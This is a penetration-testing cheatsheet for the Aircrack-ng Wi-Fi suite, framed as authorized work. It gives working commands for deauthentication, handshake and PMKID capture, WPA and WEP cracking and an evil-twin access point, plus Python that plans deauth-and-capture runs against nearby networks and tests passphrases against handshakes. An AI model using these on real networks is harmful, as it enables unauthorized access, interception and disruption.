Introduction
Aircrack-ng is a powerful suite of tools for auditing wireless network security. It includes tools for monitoring, attacking, testing, and cracking Wi-Fi 802.11 networks. This comprehensive cheatsheet provides a detailed reference for security professionals, network administrators, and cybersecurity students performing authorized wireless security assessments. Understanding these tools is essential both for securing your own networks and for identifying vulnerabilities during authorized penetration testing.
Core Concepts of Wireless Security Testing
Wi-Fi Security Protocols
- WEP (Wired Equivalent Privacy): Outdated and vulnerable
- WPA (Wi-Fi Protected Access): Improved security over WEP
- WPA2 (Wi-Fi Protected Access II): Current standard with stronger encryption
- WPA3 (Wi-Fi Protected Access III): Latest standard with enhanced security features
- Enterprise vs. Personal: Different authentication mechanisms (RADIUS server vs. Pre-shared key)
Authentication Methods
- Pre-Shared Key (PSK): Single password shared by all users
- 802.1X/EAP: Enterprise authentication using individual credentials
- SAE (Simultaneous Authentication of Equals): WPA3-Personal’s Dragonfly password-authenticated key exchange. It replaces the PSK-to-PMK derivation, not the 4-way handshake, which still runs afterwards; because the PMK no longer comes straight from the passphrase, a captured handshake cannot be brute-forced offline
Key Attack Vectors
- Packet Capture & Analysis: Intercepting and examining wireless traffic
- Deauthentication: Forcing clients to disconnect and reconnect
- Handshake Capture: Recording the EAPOL 4-way handshake frames (nonces and MIC) a client exchanges when it joins; they are sent in the clear, and the MIC lets each candidate passphrase be tested offline
- Dictionary Attacks: Testing password lists against captured handshakes
- PMKID Attacks: Extracting the PMKID that some APs include in the first EAPOL message, which can be tested against a wordlist without any connected client
- Evil Twin: Creating rogue access points to capture credentials
Aircrack-ng Suite Components
Core Tools and Functions
Tool | Purpose | Primary Use Cases |
---|---|---|
aircrack-ng | WEP/WPA/WPA2-PSK key cracking | Cracking captured handshakes, PTW attacks |
airmon-ng | Wireless interface management | Setting up monitor mode |
airodump-ng | Packet capture | Discovering networks, capturing handshakes |
aireplay-ng | Packet injection | Generating traffic, deauthentication |
airbase-ng | Fake AP setup | Creating rogue access points |
airtun-ng | Virtual tunnel interface | Injecting into, or monitoring in the clear, the traffic of a network whose key is known (wireless IDS use) |
packetforge-ng | Packet creation | Generating custom wireless frames |
wesside-ng | Automated WEP cracking | All-in-one WEP recovery |
easside-ng | Talk to a WEP AP without the key | Recovers PRGA via fragmentation and relays traffic through a buddy-ng helper host |
tkiptun-ng | WPA/TKIP attacks | Testing TKIP implementations |
besside-ng | Automated handshake capture and WEP cracking | Collecting WPA handshakes and cracking WEP keys for every network in range; it does not crack WPA itself |
Supporting Tools
Tool | Purpose |
---|---|
airdecap-ng | Decrypt WEP/WPA/WPA2 capture files |
airdecloak-ng | Remove WEP cloaking to improve cracking |
airolib-ng | Store ESSID and password lists and precompute PMKs, so aircrack-ng (-r) can skip PBKDF2 per candidate |
airserv-ng | Provide remote access to wireless cards |
buddy-ng | Helper tool for easside-ng |
ivstools | Manipulate IVS files |
kstats | Show statistical FMS attack data |
makeivs-ng | Generate an IVS file from a given WEP key, for testing the cracker |
wpaclean | Strip a capture down to the beacons and handshake frames before cracking |
Step-by-Step Wireless Assessment Process
Phase 1: Preparation
- Verify you have proper authorization to test the network
- Set up your testing environment (Kali Linux or similar)
- Confirm compatible wireless adapter with monitor mode & packet injection support
- Prepare wordlists for cracking if performing dictionary attacks
- Document target networks and testing objectives
Phase 2: Interface Setup
Identify wireless interfaces
sudo airmon-ng
Kill interfering processes
sudo airmon-ng check kill # stops NetworkManager/wpa_supplicant; your own Wi-Fi connectivity is gone until you restart them
Set interface to monitor mode
sudo airmon-ng start wlan0 # Result: monitor interface created (typically wlan0mon)
Verify monitor mode
iw dev # the new interface should report “type monitor”; iwconfig shows “Mode:Monitor” on systems that still ship it
Phase 3: Network Discovery
Scan for wireless networks
sudo airodump-ng wlan0mon
Focused scan on target network
sudo airodump-ng -c [channel] --bssid [BSSID] -w [file prefix] wlan0mon
Parameters:
- -c [channel]: lock on one channel instead of hopping, so no frames from the target are missed
- --bssid [BSSID]: target access point MAC address
- -w [file prefix]: prefix for the saved files ([file prefix]-01.cap holds the frames; [file prefix]-01.csv lists the APs and stations seen)
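The -w prefix also produces a CSV of every AP and station seen, and Phase 4 needs a client MAC paired with its AP. The following is an added Python example, not code from the cheatsheet or from the Aircrack-ng project: it parses a file in the airodump-ng CSV layout, pairs each station with the AP it is associated to, skips open, WEP and SAE networks (no crackable 4-way handshake), and prints the focused airodump-ng and directed aireplay-ng command lines. The CSV contents, MAC addresses and ESSIDs are constructed, and the interface name wlan0mon is assumed.

```python
import csv
import io
from dataclasses import dataclass, field

# Constructed sample in the layout of an airodump-ng "<prefix>-01.csv" file (not a real capture):
# an access-point section, a blank line, then a station section.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   7, CorpNet, 
66:77:88:99:AA:BB, 2024-01-01 10:00:02, 2024-01-01 10:05:00, 11,  54, OPN ,     ,    , -62,       80,        0,   0.  0.  0.  0,   9, GuestOpen, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:10, 2024-01-01 10:04:00, -50,       45, 00:11:22:33:44:55, CorpNet
AA:BB:CC:DD:EE:02, 2024-01-01 10:01:00, 2024-01-01 10:04:30, -70,        3, (not associated), CorpNet,HomeWifi
AA:BB:CC:DD:EE:03, 2024-01-01 10:01:30, 2024-01-01 10:04:50, -55,       12, 66:77:88:99:AA:BB, 
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str      # OPN, WEP, WPA, WPA2, WPA3 ... as airodump-ng prints it
    cipher: str
    auth: str         # PSK, SAE, MGT ...
    power: int
    essid: str
    clients: list = field(default_factory=list)   # MACs of associated stations


@dataclass
class Station:
    mac: str
    power: int
    bssid: str        # "(not associated)" for clients that are only probing
    probed: list      # ESSIDs the client asked for (handy when naming an evil twin)


def _rows(section):
    # airodump-ng pads fields with spaces; strip them and drop blank lines
    for row in csv.reader(io.StringIO(section), skipinitialspace=True):
        row = [f.strip() for f in row]
        if row:
            yield row


def parse_airodump_csv(text):
    """Return ({bssid: AccessPoint}, [Station]) from the contents of an airodump-ng CSV."""
    ap_section, _, station_section = text.partition("Station MAC")
    aps = {}
    for row in _rows(ap_section):
        if row[0] == "BSSID" or len(row) < 14:
            continue
        # ESSID is column 13; an ESSID that itself contains a comma would spill into later columns
        ap = AccessPoint(bssid=row[0], channel=int(row[3]), privacy=row[5], cipher=row[6],
                         auth=row[7], power=int(row[8]), essid=row[13])
        aps[ap.bssid] = ap
    stations = []
    for row in _rows("Station MAC" + station_section):
        if row[0] == "Station MAC" or len(row) < 6:
            continue
        st = Station(mac=row[0], power=int(row[3]), bssid=row[5], probed=[p for p in row[6:] if p])
        stations.append(st)
        if st.bssid in aps:
            aps[st.bssid].clients.append(st.mac)
    return aps, stations


def plan_capture(aps, iface="wlan0mon", deauth_count=5):
    """Command lines to capture a 4-way handshake from every WPA/WPA2-PSK AP that has an associated
    client, strongest signal first. Open and WEP networks have no 4-way handshake, and an SAE (WPA3)
    handshake cannot be cracked offline, so those are skipped."""
    cmds = []
    for ap in sorted(aps.values(), key=lambda a: a.power, reverse=True):
        if not ap.privacy.startswith("WPA") or "SAE" in ap.auth or not ap.clients:
            continue
        prefix = ap.essid.replace(" ", "_") or ap.bssid.replace(":", "")
        cmds.append(f"airodump-ng -c {ap.channel} --bssid {ap.bssid} -w {prefix} {iface}")
        for mac in ap.clients:   # one directed deauth per client; broadcast deauth is far less reliable
            cmds.append(f"aireplay-ng -0 {deauth_count} -a {ap.bssid} -c {mac} {iface}")
    return cmds


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in aps.values():
        print(f"{ap.bssid} ch{ap.channel:>2} {ap.privacy:<5} {ap.essid!r} clients={ap.clients}")
    for cmd in plan_capture(aps):
        print(cmd)
```

Run it against a real [file prefix]-01.csv by reading the file into parse_airodump_csv instead of SAMPLE_CSV; the station whose BSSID is “(not associated)” is the one to keep an eye on for an evil twin, since its probed ESSIDs tell you what it will auto-join.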
Phase 4: Capture Authentication Data
WPA/WPA2 Handshake Capture:
a. First, run airodump-ng focused on target
sudo airodump-ng -c [channel] --bssid [BSSID] -w [capture file] wlan0mon # frames go to [capture file]-01.cap
b. In a new terminal, deauthenticate a connected client so that it reconnects and performs the 4-way handshake
sudo aireplay-ng -0 1 -a [BSSID] -c [client MAC] wlan0mon
Parameters:
- -0 1: deauthentication attack, one round of deauth frames (raise the count if the client does not reconnect; 0 keeps sending until you stop it)
- -a [BSSID]: target access point
- -c [client MAC]: target client (optional; without it the deauth is broadcast to every client, which is less reliable)
APs and clients with Protected Management Frames (802.11w) enabled discard these forged frames; in that case wait for a natural (re)association instead.
c. Verify the capture: “WPA handshake: [BSSID]” appears in the top-right corner of the airodump-ng screen. Running aircrack-ng on the capture file with no wordlist also lists the handshakes it contains.
PMKID Capture (no client needed; hcxdumptool is a separate project, not part of the Aircrack-ng suite):
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 --filterlist=[BSSID] --filtermode=2
Option names changed between hcxdumptool releases (in the 5.x/6.x series --filterlist expects a file of MAC addresses, and 6.3 and later dropped these options and manage the interface themselves), so check hcxdumptool --help for the installed version. Only APs that put a PMKID into the first EAPOL message are affected.
WEP Data Capture:
sudo airodump-ng -c [channel] --bssid [BSSID] -w [capture file] wlan0mon # the #Data column counts captured IVs; PTW typically needs tens of thousands
Phase 5: Traffic Generation (For WEP)
Fake authentication with the access point
sudo aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [your MAC] wlan0mon
ARP request replay attack
sudo aireplay-ng -3 -b [BSSID] -h [your MAC] wlan0mon
Fragmentation attack (recovers a PRGA keystream into a .xor file that packetforge-ng can turn into an ARP request for replay; useful when the AP is too quiet for -3 to pick up an ARP frame)
sudo aireplay-ng -5 -b [BSSID] -h [your MAC] wlan0mon
Phase 6: Cracking Passwords
WPA/WPA2 Handshake Cracking:
aircrack-ng -a2 -b [BSSID] -w [wordlist path] [capture file.cap] # no root needed; cracking only reads the file
Parameters:
- -a2: WPA/WPA2-PSK mode (-a1 is WEP)
- -b [BSSID]: target access point (-e [ESSID] selects by network name instead)
- -w [wordlist path]: path to the dictionary file (a comma-separated list of files is accepted)
PMKID Cracking (hashcat, not aircrack-ng):
a. First, convert the capture; hcxpcapngtool extracts both PMKIDs and 4-way handshakes into hashcat’s 22000 format
hcxpcapngtool -o hash.22000 pmkid.pcapng
b. Then crack
hashcat -m 22000 hash.22000 [wordlist path]
hashcat’s deprecated mode 16800 expects the older PMKID-only format written by hcxpcaptool, not this output.
WEP Cracking:
aircrack-ng -b [BSSID] [capture file.cap] # PTW runs automatically and retries as more IVs arrive
Precomputed PMK attack (aircrack-ng has no rule engine; its -r option selects an airolib-ng database of PMKs precomputed for the target ESSID, which removes the PBKDF2 cost per candidate):
aircrack-ng -r [airolib database] -b [BSSID] [capture file.cap]
Rule-mangled candidates from john or hashcat can be piped in instead, since -w - reads the wordlist from stdin:
john --wordlist=[wordlist path] --rules --stdout | aircrack-ng -a2 -b [BSSID] -w - [capture file.cap]
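What aircrack-ng -a2 and hashcat -m 22000 actually compute for each wordlist candidate, as an added Python example that is not part of the cheatsheet or of the Aircrack-ng code base: PBKDF2 turns passphrase and SSID into the PMK, the 802.11i PRF expands PMK, both MACs and both nonces into the PTK, the first 16 bytes (KCK) key the MIC over EAPOL message 2, and a match means the candidate is the passphrase. The same PMK also yields the PMKID, so one PMK derivation serves both attacks. The handshake here is constructed inside the script and signed with a known passphrase; the SSID, MAC addresses, nonces and wordlist are invented. With a real capture, the EAPOL frame is the payload after the 802.11 and LLC/SNAP headers, and the nonces come from messages 1 and 2.

```python
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL-Key: 4-byte 802.1X header + 77 bytes of fields precede the 16-byte MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return ptk[:64]   # KCK = ptk[:16] is all that is needed to check the MIC


def eapol_mic(kck, eapol):
    """MIC over the EAPOL-Key frame with its MIC field zeroed; key-info bits 0-2 select the algorithm."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:                                              # WPA (TKIP)
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]      # WPA2 (CCMP); version 3 (AES-CMAC) not handled here


def check_passphrase(passphrase, ssid, aa, spa, anonce, snonce, eapol):
    """The per-candidate test: derive PMK -> PTK -> KCK, recompute the MIC, compare with the captured one."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol), eapol[MIC_OFFSET:MIC_OFFSET + 16])


def crack_handshake(wordlist, ssid, aa, spa, anonce, snonce, eapol):
    return next((w for w in wordlist if check_passphrase(w, ssid, aa, spa, anonce, snonce, eapol)), None)


def pmkid(pmk, aa, spa):
    """WPA2 PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); some APs send it in EAPOL message 1."""
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def crack_pmkid(wordlist, ssid, aa, spa, target):
    return next((w for w in wordlist
                 if hmac.compare_digest(pmkid(pmk_from_passphrase(w, ssid), aa, spa), target)), None)


# ---- constructed handshake (not a capture): EAPOL message 2 built from scratch and signed with a known passphrase
def build_eapol_m2(snonce, key_data, key_info=0x010A, replay_counter=1):
    """EAPOL-Key layout: descriptor type, key info, key length, replay counter, nonce, IV, RSC, ID, MIC, key data."""
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big") + replay_counter.to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X version 1, type 3 = EAPOL-Key


def sign_m2(eapol, passphrase, ssid, aa, spa, anonce, snonce):
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]


SSID = "CorpNet"                                                   # constructed
AA = bytes.fromhex("001122334455")                                 # AP MAC (constructed)
SPA = bytes.fromhex("aabbccddee01")                                # client MAC (constructed)
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))            # constructed nonces
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # CCMP/PSK RSN element as key data
TRUE_PASSPHRASE = "correct horse battery"
M2 = sign_m2(build_eapol_m2(SNONCE, RSN_IE), TRUE_PASSPHRASE, SSID, AA, SPA, ANONCE, SNONCE)
PMKID_FROM_M1 = pmkid(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AA, SPA)
WORDLIST = ["password", "CorpNet2024", "correct horse battery", "letmein"]   # constructed

if __name__ == "__main__":
    print("handshake:", crack_handshake(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, M2))
    print("pmkid:    ", crack_pmkid(WORDLIST, SSID, AA, SPA, PMKID_FROM_M1))
```

The 4096 PBKDF2 iterations per candidate are what make WPA2 cracking slow and what airolib-ng precomputation and GPU cracking attack; everything after the PMK is a handful of HMACs. A tampered EAPOL frame (or the wrong nonces) fails the MIC check even with the right passphrase, which is why airodump-ng must see the matching message pair and not just any EAPOL frame.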
Phase 7: Post-Exploitation Verification
Decrypt captured packets
airdecap-ng -p [password] -e [ESSID] [capture file.cap] # WPA/WPA2; for WEP pass the hex key with -w instead, output goes to [capture file]-dec.cap
Connect to the network to verify access
Document findings and recommendations
Clean up temporary files
Advanced Techniques & Commands
Targeted BSSID & Client Deauthentication
Deauthenticate all clients from specific AP
sudo aireplay-ng -0 0 -a [BSSID] wlan0mon # continuous; knocks every client off the AP until you stop it, so keep it inside the authorized window
Deauthenticate specific client
sudo aireplay-ng -0 0 -a [BSSID] -c [client MAC] wlan0mon
Deauthenticate multiple networks using a list
sudo mdk4 wlan0mon d -b blacklist.txt # mdk4 is a separate tool, not part of the Aircrack-ng suite; blacklist.txt lists target MACs, one per line
Evil Twin Attack Setup
Setup fake AP
sudo airbase-ng -e [Target ESSID] -c [channel] wlan0mon
Configure the at0 tap interface that airbase-ng creates (assigning the address also installs the connected route for 192.168.1.0/24)
sudo ifconfig at0 up 192.168.1.1 netmask 255.255.255.0 # or: ip addr add 192.168.1.1/24 dev at0; ip link set at0 up
Setup DHCP server (dnsmasq.conf must bind to at0 and hand out a range inside 192.168.1.0/24)
sudo dnsmasq -C dnsmasq.conf -d
Enable routing (writing to /proc with “sudo echo 1 > …” fails because the redirect runs as the unprivileged user)
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Passive Handshake Collection
Without sending any deauth frames, leave airodump-ng on the target channel and wait for clients to join or roam; the handshake is logged exactly as in Phase 4. To collect from several APs at once, drop --bssid and hop over a channel list (-c accepts a comma-separated list):
sudo airodump-ng -c 1,6,11 -w captures wlan0mon
Advanced WEP Cracking
Korek ChopChop attack (recovers one packet’s keystream without the key into a .xor PRGA file, which packetforge-ng can turn into an ARP request for replay)
sudo aireplay-ng -4 -b [BSSID] -h [your MAC] wlan0mon
Caffe Latte attack (client-side WEP)
sudo aireplay-ng -6 -b [BSSID] -h [your MAC] wlan0mon
Hirte attack (client-side WEP)
sudo aireplay-ng -7 -b [BSSID] -h [your MAC] wlan0mon
Common Challenges & Solutions
Hardware Issues
Issue | Solution |
---|---|
Monitor mode not working | Confirm the driver lists “monitor” under “Supported interface modes” in iw list; install the chipset’s out-of-tree driver (e.g. aircrack-ng’s rtl8812au) rather than changing kernels |
Packet injection failing | Run sudo aireplay-ng -9 wlan0mon to test |
Weak signal | Use directional antenna, adjust positioning |
USB adapter disconnects | Use powered USB hub, check overheating |
Software/Attack Issues
Issue | Solution |
---|---|
No handshake captured | Use a directed deauth (-c) against a client that is visibly passing data; if the network uses PMF (802.11w) the deauth is ignored, so wait for a natural reconnect |
WPA handshake not verified | Look for “WPA handshake” in airodump-ng; aircrack-ng needs EAPOL messages 1+2 or 2+3 with matching replay counters, so a capture holding only message 1 is useless |
Slow cracking performance | Use GPU acceleration, optimize wordlist |
Crowded Wi-Fi channels | Target networks on less congested channels |
Best Practices for Wi-Fi Security Assessment
Testing Ethics & Legal Considerations
- Always obtain explicit permission before testing
- Document scope and authorization in writing
- Avoid disrupting production networks
- Protect captured data according to client’s security policies
- Stay within defined scope boundaries
Efficient Password Cracking
- Start with targeted wordlists relevant to the organization
- Use rule-based attacks for common password patterns
- Implement mask attacks for known password policies
- Utilize GPU acceleration when available
- Consider distributed cracking for complex passwords
Documentation & Reporting
- Capture detailed evidence of vulnerabilities
- Document each step of the assessment process
- Include actionable recommendations for remediation
- Classify findings by severity and impact
- Provide executive summary for non-technical stakeholders
Attack Mitigation Techniques
Attack Method | Recommended Defense |
---|---|
WEP Cracking | Upgrade to WPA2/WPA3 |
Handshake Capture | Capture itself cannot be prevented; use a long random passphrase (or WPA3-SAE) so the captured handshake is not crackable offline |
Evil Twin | Implement 802.1X with server certificate validation |
Deauthentication | Enable Protected Management Frames (PMF) |
Dictionary Attacks | Enforce strong password policy |
PMKID Attacks | Use WPA Enterprise or WPA3; for WPA2-PSK, a long random passphrase makes the captured PMKID uncrackable |
Comparison of Wi-Fi Security Standards
Feature | WEP | WPA | WPA2 | WPA3 |
---|---|---|---|---|
Encryption | RC4 (weak) | TKIP (RC4) | CCMP (AES) | CCMP-128; GCMP-256 in Enterprise 192-bit mode |
Key Length | 40/104-bit (marketed as 64/128) | 128-bit | 128-bit | 128-bit (192-bit in Enterprise mode) |
Vulnerability to Aircrack-ng | Highly vulnerable (key recovered from IVs) | Moderately vulnerable | Vulnerable only with a weak passphrase | Resistant: SAE blocks offline dictionary attacks |
Authentication | Open or Shared Key | PSK or 802.1X | PSK or 802.1X | SAE or 802.1X |
Common Attack Vectors | IV collisions, statistical (FMS/KoreK/PTW) | TKIP MIC attacks, dictionary | Dictionary, PMKID | Side-channel and downgrade attacks (Dragonblood, WPA2/WPA3 transition mode) |
Aircrack-ng Attack Time | Minutes | Hours to days, depending on passphrase strength | Hours to days, depending on passphrase strength | Impractical offline |
Resources for Further Learning
Official Documentation
Books & Publications
- “Penetration Testing: A Hands-On Introduction to Hacking”
- “Kali Linux Wireless Penetration Testing Beginner’s Guide”
- “BackTrack 5 Wireless Penetration Testing”
- “Hacking Exposed Wireless”
Online Courses & Training
- Offensive Security Wireless Attacks (WiFu)
- SANS SEC617: Wireless Penetration Testing and Ethical Hacking
- Pentester Academy – WiFi Security and Pentesting
- Udemy and Coursera wireless security courses
Communities & Forums
- Aircrack-ng Forums
- Kali Linux Forums
- HackForums Wireless Security Section
- Reddit r/HowToHack and r/AskNetSec
Quick Tips for Effective Wireless Assessment
- Use high-quality wireless adapters with Atheros or Realtek chipsets
- Test during off-hours to minimize network disruption
- Create a dedicated testing environment separate from production
- Maintain a collection of proven wordlists for different scenarios
- Keep tools and drivers updated for best compatibility
- Use Kali Linux for a comprehensive toolkit pre-installed
- Consider multiple antennas for better coverage in large environments
- Document your methodology for consistent and repeatable testing
- Always clean up captured files containing sensitive information
- Stay updated on new wireless security vulnerabilities and techniques